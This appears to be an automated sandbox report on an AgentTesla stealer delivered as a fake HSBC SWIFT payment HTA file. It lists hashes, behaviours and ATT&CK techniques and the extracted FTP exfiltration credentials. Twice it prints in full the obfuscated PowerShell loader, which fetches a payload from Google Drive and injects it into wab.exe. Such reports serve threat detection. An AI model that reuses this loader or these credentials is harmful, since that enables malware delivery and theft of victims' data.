agenttesla | 413edb098cc00d5456c57941a10faf691f8ca3266ae6d8538636b7ea9bcf660f

General

Target

25042024 - HSBC Payment SWIFT COPY PAGES.hta
Size

8KB
MD5

faf3762a6e994f4e79d87d817ce62e16
SHA1

85517ba95bed123d356ce026192d913acf6e97ea
SHA256

413edb098cc00d5456c57941a10faf691f8ca3266ae6d8538636b7ea9bcf660f
SHA512

b7522895d2d72d1980184b0d0dc19d1e22082311bfbbe77ead3e9039c650dd5527970c86a74982c87e05255d18e7c6b016187747b4b99be0b155ca351ecf1c92
SSDEEP

192:pFH6Jy7ik4n2AV2PP0PFDQlHfCe4z9dfzWQ/0EY2ibM0wTstRA:pj472EPFy/Ce4znfzWQ//JiM5Te+

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.petrolic-eg.com
Port:
21
Username:
outcome
Password:
Random@1245

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2176 powershell.exe
7 2176 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 api.ipify.org
14 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1952 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2664 powershell.exe
1952 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2664 set thread context of 1952 2664 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2176 powershell.exe
2664 powershell.exe
2664 powershell.exe
1952 wab.exe
1952 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2664 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2176 powershell.exe
Token: SeDebugPrivilege 2664 powershell.exe
Token: SeDebugPrivilege 1952 wab.exe

flow	pid	process
5	2176	powershell.exe
7	2176	powershell.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

flow	ioc
13	api.ipify.org
14	api.ipify.org

pid	process
1952	wab.exe

pid	process
2664	powershell.exe
1952	wab.exe

description	pid	process	target process
PID 2664 set thread context of 1952	2664	powershell.exe	wab.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2176	powershell.exe
2664	powershell.exe
2664	powershell.exe
1952	wab.exe
1952	wab.exe

pid	process
2664	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	1952	wab.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

mshta.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2008 wrote to memory of 2176	2008	mshta.exe	powershell.exe
PID 2008 wrote to memory of 2176	2008	mshta.exe	powershell.exe
PID 2008 wrote to memory of 2176	2008	mshta.exe	powershell.exe
PID 2008 wrote to memory of 2176	2008	mshta.exe	powershell.exe
PID 2176 wrote to memory of 2700	2176	powershell.exe	cmd.exe
PID 2176 wrote to memory of 2700	2176	powershell.exe	cmd.exe
PID 2176 wrote to memory of 2700	2176	powershell.exe	cmd.exe
PID 2176 wrote to memory of 2700	2176	powershell.exe	cmd.exe
PID 2176 wrote to memory of 2664	2176	powershell.exe	powershell.exe
PID 2176 wrote to memory of 2664	2176	powershell.exe	powershell.exe
PID 2176 wrote to memory of 2664	2176	powershell.exe	powershell.exe
PID 2176 wrote to memory of 2664	2176	powershell.exe	powershell.exe
PID 2664 wrote to memory of 2924	2664	powershell.exe	cmd.exe
PID 2664 wrote to memory of 2924	2664	powershell.exe	cmd.exe
PID 2664 wrote to memory of 2924	2664	powershell.exe	cmd.exe
PID 2664 wrote to memory of 2924	2664	powershell.exe	cmd.exe
PID 2664 wrote to memory of 1952	2664	powershell.exe	wab.exe
PID 2664 wrote to memory of 1952	2664	powershell.exe	wab.exe
PID 2664 wrote to memory of 1952	2664	powershell.exe	wab.exe
PID 2664 wrote to memory of 1952	2664	powershell.exe	wab.exe
PID 2664 wrote to memory of 1952	2664	powershell.exe	wab.exe
PID 2664 wrote to memory of 1952	2664	powershell.exe	wab.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\25042024 - HSBC Payment SWIFT COPY PAGES.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Brlet = 1;$Monimolite='Substrin';$Monimolite+='g';Function Rhd($Chefkonsulenten121){$Containerterminalernes=$Chefkonsulenten121.Length-$Brlet;For($Salgsprisens=5; $Salgsprisens -lt $Containerterminalernes; $Salgsprisens+=(6)){$Udseenderne+=$Chefkonsulenten121.$Monimolite.Invoke($Salgsprisens, $Brlet);}$Udseenderne;}function Tonitas($Nontraditional){&($Ublufrdigheden) ($Nontraditional);}$Artighedernes=Rhd ',aiwaMBegyno E,sizFllesiRejemlSy,telRabidaC,tal/ D.li5 etap. U.va0Serv, crypt( InevW,ymphiJagtlnNeurodMatemo HoldwLa gusa,tin GeneoNUnfulT Whar Reakt1Snowi0Celti.Spott0B.udu;Landm enegWbalaciTurnenNonv,6Esche4Fibon;Prona Pr.olxB.gge6Arsoi4provi;Brave BravirPirogv D,st:Briga1Ce,ha2Innov1Kal.e.Corra0Ri ua)Morch Au.tGDdsk eLattecSa.thkE.hedoFagle/ ldol2S,and0Expos1 Skol0 Ta,m0 Bred1Forme0Belus1M lle SlanFIndefiHimmerpublie,ikotfunimpoSaplex Burg/Sto.s1Brnds2Sysse1Campa. .ope0 hit ';$Kilobytenes=Rhd 'Barn UAnonys SpineTandkrClo.k-Dest,ANeg,ig MigreSkannnTongutSorts ';$phytoplasm=Rhd 'Hexachdiannt M,trtPr sapStadss U,sa:K.rul/Macro/,iktadPenalrUdenriAhartvKontreFedtf.Mas.eg LovroListeob rtlgSpumelOsteoePolar.blawicKommuoKred m ank/HeteruSydslc Gal,?FagbleCosm,xShorepAnirioCo mirIntrotcanyo=RushidC prio TykhwlucernPrerelSondaomaalra KurtdFlatb&Silkei OrdtdAuks =Permu1 FolkQPreplHRennewS,rog_SolacaStvekt darmmmaureuGenerRStartrK nku5,ntomETas.n1 miliv Mou,GExodexTuretGBrugeJU,loamCubatPenfouo Fem,1ModifMUlyste Tint0TallodSemandRecryFAutenYPokke8bu zazttnesSApurp ';$Kildematerialet=Rhd 'eva o>Passa ';$Ublufrdigheden=Rhd 'ince.iProd,e IntexRid,h ';$Festered='Anstandsdames';Tonitas (Rhd 'Sa grS BrileMortitSermo- R avCEndomoJurisnRadiltBagd.eSerranEkspotAffal Let a-sn skPOversau mantFagkohRavin KalorT hand: Viru\VerdeO ArgaxMaguay MusldXanth.RudimtIglooxTotaltSursy v,rs-C wboVAftviaFuldelAfskiuMiliteDepra Bodyb$UforsF pdee Pre sMedi.t prvee RattrS iseeRumfad.ifto;Pelsd ');Tonitas (Rhd 'MultiiF.rfif owe Bangl(FeststIdiose M,mssSabaetRgfor-CulotpExempaEmbrotSkudlh Neds perp.TMalp : odes\SalveOLoxi,x V.siyTopkod Graa.GenertHuarax TsentRgrel) C ly{ LommeMetodxko.ceiEffe.tDimmi},lndv;Khaju ');$Switchgear = Rhd '.nkteeIn.arc optihcasefoEpide S,age%Stoppa A mipMoresp ,robdd capaVaaretVittiaSclat%Smleh\AdverSValeupalkydeDebitc vnhiGensbfSymboiCholecrafleeShortr Spati.ullan Thacg Pav eTrekanPolymsWordi.PageufBegotr onnoiOph.h P oth& .eal& Nitr Censoe opsocForsthL dseoAntic mal.c$Stigm ';Tonitas (Rhd 'Apast$Kemikg L,cklStrowoAfspnb S raaKommalFikse:Unsp PArginrEffemoPljerlbomb,e AnnetValetaM camr,ntikiVam esHalfneP,odurAffileA,dittJackf=Miser(SvartcClawemLa,dsdMonoc Flagd/,uculcLa.df Sysle$feltpSAb trwEnsuliHo.dntPilmbcSortshOver,gC.paieBoghoaFo,laragren)Jaal. ');Tonitas (Rhd 'Balan$Brookg,jemslU.arioU,affbary naStewalBukse:De.ilTEnergy oncurNonpoa avetnKunstnAnthee toplr KatanPycniePe un=El ct$Sa ompHirakhcra.ey au.ot ForsoStormpclotwlDihysaOver,sChar mSells.Ther.s kirspTobaklSnowbiSalontUnyac(Trstr$HypnoK TlpeiQuoinl Su,cdPisseeCytopmSknk,aPronet Sl.vedisburHiccuiCa.quaStrablNulpue AarltRumli) Bred ');$phytoplasm=$Tyrannerne[0];Tonitas (Rhd 'pinch$StrukgTrommlExt.aoSp.lobInteraSkridlV,deo:SvensM Bedee ,ekrnQuiz aCacocc ,eltefor.em SemieSpirin .erct oman=GodkeNSoot e.loatwFo.sk-SatinOSkillbStbegjForsie.ntiscVag ptSnort I,raeS HuskyRe.arsTyvektUn ureHabsbmNomin. VelsNDerboeGemaltKirte.Nyta,W S,nie AadsbGalocC arrelUd ggi CabeeDisprnRe litLejes ');Tonitas (Rhd 'Meses$DokumMCo.mae Krikn KhamaI.eloc Artee sagtmFundae lagenPropht,ulga.OracuH Te.se Op,ea AfskdlinseeSbebor B.ddsRigdo[Flade$UnbedKBut kiHelullMarjaoarmodbornityUntumt .raveSkoinnJuareePlantsBoxma]Polle=lopho$VioliATredjrBa bitOve,siFredlgScybahVariaeunpoidReckoebe lyr AbesnBristeRe.nisBli d ');$Middleclass136=Rhd 'In.anMReg seBlyannInstraStrancDesideNonsumAns,aeOm ednProjetCof,c.A,watDWo,bioori.nwcinn.nAfgiflbowero Absta rgbod PostFCentriTodaglDri ze alpe(Inost$ Affop Ansph,ncomyDideptSibyloslyngp sk,rlOver,aGlirisForgrmPrp,r,appro$JustiP p.oda.innahCompas ernieCymatrpatar)Milje ';$Middleclass136=$Proletariseret[1]+$Middleclass136;$Pahser=$Proletariseret[0];Tonitas (Rhd 'Unmec$ArtergBehaglSpaewoOverfb.rigcaIdeollM.zed: FeriB NumirPenalomachib,hainySkolegUnve.g.eucoedominrTransiDulbee billrTorc,n CockeModer=Outri(OppusTSinapeUn,masBomset ,nth- InteP,tninaCiviltMad.phAnnon elta$K.rniP.uvgeafrkaphBoblesFlk,eeK nser P ag)Heart ');while (!$Brobyggerierne) {Tonitas (Rhd ' Pric$Fordag AminlR,vivoBenevb .vera BemelZagg.:.fterSK bebcBov,iaUdvaenSquamdUnimpaKamfelViruli GrubsA.alieChaindDocum=Smidi$ CarctCyrtor UndsuBirose Micr ') ;Tonitas $Middleclass136;Tonitas (Rhd ' Sl.tSSlipotOrdinabeev rSupertUnsyn- Ser.SSt.enlpereueSkriveSpo,lpMachi Dan,e4 Ult ');Tonitas (Rhd 'Inter$Regnsgbl trl Runao JapibKata.aHomogl tolt:Au unBU skir Ua mo.trikbSenneySpretgpleasgObjekeBe.gerHul,ti PrioeUnrevrCanann Unr e Hell=S.yge( La eTDogsle,ersks ubritTresp-SkattPDgnceaPenoct Mat.h Desp ,nbru$Dowe.PBayamaCounth FremsBaad,eGafferMeria)Preob ') ;Tonitas (Rhd 'Bejap$proz.gMalnulsydl.oQuavebEndama triqlAgave:Hi.cuGVenviaV,albrGravla ski,=Morte$Belusg ClaslSkabeofunktbPos paindefl Acro:CheriNDelo oBrollnM tincNipcho OctanbistavKrim,e H mor CoresKof,aa KampbUdsvelMische Syd,nTampee Pla,sFersksSy le2anton2Uafst6Sorge+ Chri+S,inb%Compl$ men,TCystoyLsesarStanga s.ann S,rannytese C.iar Gia,nEndosePhoni.,lpincB.rtlo Spl u ArtinnonsytS bdi ') ;$phytoplasm=$Tyrannerne[$Gara];}Tonitas (Rhd 'Spec $ .avogTehanlS.ympoNunnibGiganauncaulSmigr:HenstPVaskehKloroialacrlPosteaAuritnGipsytKampuhNov.brNat ooMe.chpR dikiSkalls.kureiDrgl,nKom.igSt.rt2Orran2stlan3Offic Tunne=Kredi togebG neume.rdsetT ade-F,ankCU,dero An,in Ny tt Ver eMentanKn,ghtApofe Impal$ Mi.cPSmugra Subuh TempsB lboe Twi.rsk ot ');Tonitas (Rhd ',rlys$Wilsog ArgulSt deohousebSpyetaIfrerlHippa:Bor,hT hvidoS.irrb tigaIncaskcinepsE,versO,tanoWinfivUnpinsSupe eInternFanglsRvrdi Ly.st=Solmi .nde[Ud.anSOversy ntersHyloit.uldeeStdfamWe.gh.NoretCSav roServinStr kvS ntaeJaiwhrAndelttrass] Spik: P.ra: AbsoFSemiorOpposoSto,kmTosdeBUdlodaStyklsunpoae Livs6konge4DeligS Soult chevr Des.iArbejnEuropg Unde(Propy$ ImpePEllokhA,omii Faral Tr paFavntnTetrat PhyshFi,mir ForsoUngu,pFirevi OrgusSammeiGliganBorg gEmbra2Septi2 Skra3extra) Fien ');Tonitas (Rhd ' nraa$Non.ngHydrolBondeoUn,abb,ubloa RummlDe ic:GalilE Ca.asEnfrao IncupProtehVeltiaB.dutgSolfeo VarisTr,dat Ind,oUnderm Collysorte Yderi=Holle ,odsp[immorSIce,ayBeg.dsUbehetLovfoeArre.m S in. FrutTpsalteKvab.xcentrtLinan.Frie,EIsaben SigmcAnch oDe,ogd ShapiRor enProcegUnlot] Dry.:Pregr:AbnegAEut,pSBureaCUntowIOrnamIU,tra.CoappGUricaeKlodstove.mSWallitScenerTobakiCha,tnAvisugLangs(Soff $ KalmToverboNoncobAntimaSan,sk mestsInvers Lapio UdenvC,itisRednie Regin ikkes ende)Frem, ');Tonitas (Rhd 'Gldsv$ BssegHerbel ortaoPraksbMorseaHyperlmarik:Ro teA,illinTr agdInt reOvercrIroniiVeter=Psitt$VentrEdrm,esOphngo Npb p ,ktehSt.ppaRepugg S.oco GnavsNeol.tFakkeoSp.ogmPh.naySamit.Diaces ctiou re.lbKontrsS irttDisperTimotiSva mnF,ispgDiete(Pseud2Stude9B.ite8Die,e6Scrim8 Regn2Bi io,Unos,2O,ers8 Unfe9Fejes9spryd1 Stor) Me l ');Tonitas $Anderi;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificeringens.fri && echo $"
3⤵
PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Brlet = 1;$Monimolite='Substrin';$Monimolite+='g';Function Rhd($Chefkonsulenten121){$Containerterminalernes=$Chefkonsulenten121.Length-$Brlet;For($Salgsprisens=5; $Salgsprisens -lt $Containerterminalernes; $Salgsprisens+=(6)){$Udseenderne+=$Chefkonsulenten121.$Monimolite.Invoke($Salgsprisens, $Brlet);}$Udseenderne;}function Tonitas($Nontraditional){&($Ublufrdigheden) ($Nontraditional);}$Artighedernes=Rhd ',aiwaMBegyno E,sizFllesiRejemlSy,telRabidaC,tal/ D.li5 etap. U.va0Serv, crypt( InevW,ymphiJagtlnNeurodMatemo HoldwLa gusa,tin GeneoNUnfulT Whar Reakt1Snowi0Celti.Spott0B.udu;Landm enegWbalaciTurnenNonv,6Esche4Fibon;Prona Pr.olxB.gge6Arsoi4provi;Brave BravirPirogv D,st:Briga1Ce,ha2Innov1Kal.e.Corra0Ri ua)Morch Au.tGDdsk eLattecSa.thkE.hedoFagle/ ldol2S,and0Expos1 Skol0 Ta,m0 Bred1Forme0Belus1M lle SlanFIndefiHimmerpublie,ikotfunimpoSaplex Burg/Sto.s1Brnds2Sysse1Campa. .ope0 hit ';$Kilobytenes=Rhd 'Barn UAnonys SpineTandkrClo.k-Dest,ANeg,ig MigreSkannnTongutSorts ';$phytoplasm=Rhd 'Hexachdiannt M,trtPr sapStadss U,sa:K.rul/Macro/,iktadPenalrUdenriAhartvKontreFedtf.Mas.eg LovroListeob rtlgSpumelOsteoePolar.blawicKommuoKred m ank/HeteruSydslc Gal,?FagbleCosm,xShorepAnirioCo mirIntrotcanyo=RushidC prio TykhwlucernPrerelSondaomaalra KurtdFlatb&Silkei OrdtdAuks =Permu1 FolkQPreplHRennewS,rog_SolacaStvekt darmmmaureuGenerRStartrK nku5,ntomETas.n1 miliv Mou,GExodexTuretGBrugeJU,loamCubatPenfouo Fem,1ModifMUlyste Tint0TallodSemandRecryFAutenYPokke8bu zazttnesSApurp ';$Kildematerialet=Rhd 'eva o>Passa ';$Ublufrdigheden=Rhd 'ince.iProd,e IntexRid,h ';$Festered='Anstandsdames';Tonitas (Rhd 'Sa grS BrileMortitSermo- R avCEndomoJurisnRadiltBagd.eSerranEkspotAffal Let a-sn skPOversau mantFagkohRavin KalorT hand: Viru\VerdeO ArgaxMaguay MusldXanth.RudimtIglooxTotaltSursy v,rs-C wboVAftviaFuldelAfskiuMiliteDepra Bodyb$UforsF pdee Pre sMedi.t prvee RattrS iseeRumfad.ifto;Pelsd ');Tonitas (Rhd 'MultiiF.rfif owe Bangl(FeststIdiose M,mssSabaetRgfor-CulotpExempaEmbrotSkudlh Neds perp.TMalp : odes\SalveOLoxi,x V.siyTopkod Graa.GenertHuarax TsentRgrel) C ly{ LommeMetodxko.ceiEffe.tDimmi},lndv;Khaju ');$Switchgear = Rhd '.nkteeIn.arc optihcasefoEpide S,age%Stoppa A mipMoresp ,robdd capaVaaretVittiaSclat%Smleh\AdverSValeupalkydeDebitc vnhiGensbfSymboiCholecrafleeShortr Spati.ullan Thacg Pav eTrekanPolymsWordi.PageufBegotr onnoiOph.h P oth& .eal& Nitr Censoe opsocForsthL dseoAntic mal.c$Stigm ';Tonitas (Rhd 'Apast$Kemikg L,cklStrowoAfspnb S raaKommalFikse:Unsp PArginrEffemoPljerlbomb,e AnnetValetaM camr,ntikiVam esHalfneP,odurAffileA,dittJackf=Miser(SvartcClawemLa,dsdMonoc Flagd/,uculcLa.df Sysle$feltpSAb trwEnsuliHo.dntPilmbcSortshOver,gC.paieBoghoaFo,laragren)Jaal. ');Tonitas (Rhd 'Balan$Brookg,jemslU.arioU,affbary naStewalBukse:De.ilTEnergy oncurNonpoa avetnKunstnAnthee toplr KatanPycniePe un=El ct$Sa ompHirakhcra.ey au.ot ForsoStormpclotwlDihysaOver,sChar mSells.Ther.s kirspTobaklSnowbiSalontUnyac(Trstr$HypnoK TlpeiQuoinl Su,cdPisseeCytopmSknk,aPronet Sl.vedisburHiccuiCa.quaStrablNulpue AarltRumli) Bred ');$phytoplasm=$Tyrannerne[0];Tonitas (Rhd 'pinch$StrukgTrommlExt.aoSp.lobInteraSkridlV,deo:SvensM Bedee ,ekrnQuiz aCacocc ,eltefor.em SemieSpirin .erct oman=GodkeNSoot e.loatwFo.sk-SatinOSkillbStbegjForsie.ntiscVag ptSnort I,raeS HuskyRe.arsTyvektUn ureHabsbmNomin. VelsNDerboeGemaltKirte.Nyta,W S,nie AadsbGalocC arrelUd ggi CabeeDisprnRe litLejes ');Tonitas (Rhd 'Meses$DokumMCo.mae Krikn KhamaI.eloc Artee sagtmFundae lagenPropht,ulga.OracuH Te.se Op,ea AfskdlinseeSbebor B.ddsRigdo[Flade$UnbedKBut kiHelullMarjaoarmodbornityUntumt .raveSkoinnJuareePlantsBoxma]Polle=lopho$VioliATredjrBa bitOve,siFredlgScybahVariaeunpoidReckoebe lyr AbesnBristeRe.nisBli d ');$Middleclass136=Rhd 'In.anMReg seBlyannInstraStrancDesideNonsumAns,aeOm ednProjetCof,c.A,watDWo,bioori.nwcinn.nAfgiflbowero Absta rgbod PostFCentriTodaglDri ze alpe(Inost$ Affop Ansph,ncomyDideptSibyloslyngp sk,rlOver,aGlirisForgrmPrp,r,appro$JustiP p.oda.innahCompas ernieCymatrpatar)Milje ';$Middleclass136=$Proletariseret[1]+$Middleclass136;$Pahser=$Proletariseret[0];Tonitas (Rhd 'Unmec$ArtergBehaglSpaewoOverfb.rigcaIdeollM.zed: FeriB NumirPenalomachib,hainySkolegUnve.g.eucoedominrTransiDulbee billrTorc,n CockeModer=Outri(OppusTSinapeUn,masBomset ,nth- InteP,tninaCiviltMad.phAnnon elta$K.rniP.uvgeafrkaphBoblesFlk,eeK nser P ag)Heart ');while (!$Brobyggerierne) {Tonitas (Rhd ' Pric$Fordag AminlR,vivoBenevb .vera BemelZagg.:.fterSK bebcBov,iaUdvaenSquamdUnimpaKamfelViruli GrubsA.alieChaindDocum=Smidi$ CarctCyrtor UndsuBirose Micr ') ;Tonitas $Middleclass136;Tonitas (Rhd ' Sl.tSSlipotOrdinabeev rSupertUnsyn- Ser.SSt.enlpereueSkriveSpo,lpMachi Dan,e4 Ult ');Tonitas (Rhd 'Inter$Regnsgbl trl Runao JapibKata.aHomogl tolt:Au unBU skir Ua mo.trikbSenneySpretgpleasgObjekeBe.gerHul,ti PrioeUnrevrCanann Unr e Hell=S.yge( La eTDogsle,ersks ubritTresp-SkattPDgnceaPenoct Mat.h Desp ,nbru$Dowe.PBayamaCounth FremsBaad,eGafferMeria)Preob ') ;Tonitas (Rhd 'Bejap$proz.gMalnulsydl.oQuavebEndama triqlAgave:Hi.cuGVenviaV,albrGravla ski,=Morte$Belusg ClaslSkabeofunktbPos paindefl Acro:CheriNDelo oBrollnM tincNipcho OctanbistavKrim,e H mor CoresKof,aa KampbUdsvelMische Syd,nTampee Pla,sFersksSy le2anton2Uafst6Sorge+ Chri+S,inb%Compl$ men,TCystoyLsesarStanga s.ann S,rannytese C.iar Gia,nEndosePhoni.,lpincB.rtlo Spl u ArtinnonsytS bdi ') ;$phytoplasm=$Tyrannerne[$Gara];}Tonitas (Rhd 'Spec $ .avogTehanlS.ympoNunnibGiganauncaulSmigr:HenstPVaskehKloroialacrlPosteaAuritnGipsytKampuhNov.brNat ooMe.chpR dikiSkalls.kureiDrgl,nKom.igSt.rt2Orran2stlan3Offic Tunne=Kredi togebG neume.rdsetT ade-F,ankCU,dero An,in Ny tt Ver eMentanKn,ghtApofe Impal$ Mi.cPSmugra Subuh TempsB lboe Twi.rsk ot ');Tonitas (Rhd ',rlys$Wilsog ArgulSt deohousebSpyetaIfrerlHippa:Bor,hT hvidoS.irrb tigaIncaskcinepsE,versO,tanoWinfivUnpinsSupe eInternFanglsRvrdi Ly.st=Solmi .nde[Ud.anSOversy ntersHyloit.uldeeStdfamWe.gh.NoretCSav roServinStr kvS ntaeJaiwhrAndelttrass] Spik: P.ra: AbsoFSemiorOpposoSto,kmTosdeBUdlodaStyklsunpoae Livs6konge4DeligS Soult chevr Des.iArbejnEuropg Unde(Propy$ ImpePEllokhA,omii Faral Tr paFavntnTetrat PhyshFi,mir ForsoUngu,pFirevi OrgusSammeiGliganBorg gEmbra2Septi2 Skra3extra) Fien ');Tonitas (Rhd ' nraa$Non.ngHydrolBondeoUn,abb,ubloa RummlDe ic:GalilE Ca.asEnfrao IncupProtehVeltiaB.dutgSolfeo VarisTr,dat Ind,oUnderm Collysorte Yderi=Holle ,odsp[immorSIce,ayBeg.dsUbehetLovfoeArre.m S in. FrutTpsalteKvab.xcentrtLinan.Frie,EIsaben SigmcAnch oDe,ogd ShapiRor enProcegUnlot] Dry.:Pregr:AbnegAEut,pSBureaCUntowIOrnamIU,tra.CoappGUricaeKlodstove.mSWallitScenerTobakiCha,tnAvisugLangs(Soff $ KalmToverboNoncobAntimaSan,sk mestsInvers Lapio UdenvC,itisRednie Regin ikkes ende)Frem, ');Tonitas (Rhd 'Gldsv$ BssegHerbel ortaoPraksbMorseaHyperlmarik:Ro teA,illinTr agdInt reOvercrIroniiVeter=Psitt$VentrEdrm,esOphngo Npb p ,ktehSt.ppaRepugg S.oco GnavsNeol.tFakkeoSp.ogmPh.naySamit.Diaces ctiou re.lbKontrsS irttDisperTimotiSva mnF,ispgDiete(Pseud2Stude9B.ite8Die,e6Scrim8 Regn2Bi io,Unos,2O,ers8 Unfe9Fejes9spryd1 Stor) Me l ');Tonitas $Anderi;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificeringens.fri && echo $"
4⤵
PID:2924

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
d71b7edc7f66fc400f8bf970a598ddac

SHA1
9682cff8d1819fce1eea9c87a11855638e4b8a1f

SHA256
6c8cec3d96b3cec15ea9bbf8b60c353d15ca72e564c074812b05313b18f5afd7

SHA512
d64933ba20465c4aca3da4d49ba898ff706949361c2f89c5b82c84804e50dd670d6c7624a654bb15133c9fd4c8a978f8fecc12395b1d75292f30adb8c0aad35a

Download Submit
C:\Users\Admin\AppData\Roaming\Specificeringens.fri
Filesize
426KB

MD5
36c02906ed6e72454a84bf3f874f3e8d

SHA1
0f8ba64a4da4871058d283a7e08b4a185e7b891e

SHA256
7a565e10f6fd5a9e8c22c632c3c86f0b66773e373e4e14deb6bd190382c3cb98

SHA512
a5b1337872b951392570b2238e8334b60172a257631f0bfb3680dd0ee75490258c4200e08bb9b1f257afdfd0ca17f72d49c612e5e8ff17ded6f4c0ea33f813f8

Download Submit
memory/1952-37-0x00000000006C0000-0x0000000001722000-memory.dmp

Filesize
16.4MB

Download
memory/1952-38-0x00000000006C0000-0x0000000000700000-memory.dmp

Filesize
256KB

Download
memory/2664-15-0x00000000065E0000-0x00000000083D1000-memory.dmp

Filesize
29.9MB

Download

Analysis

Sharing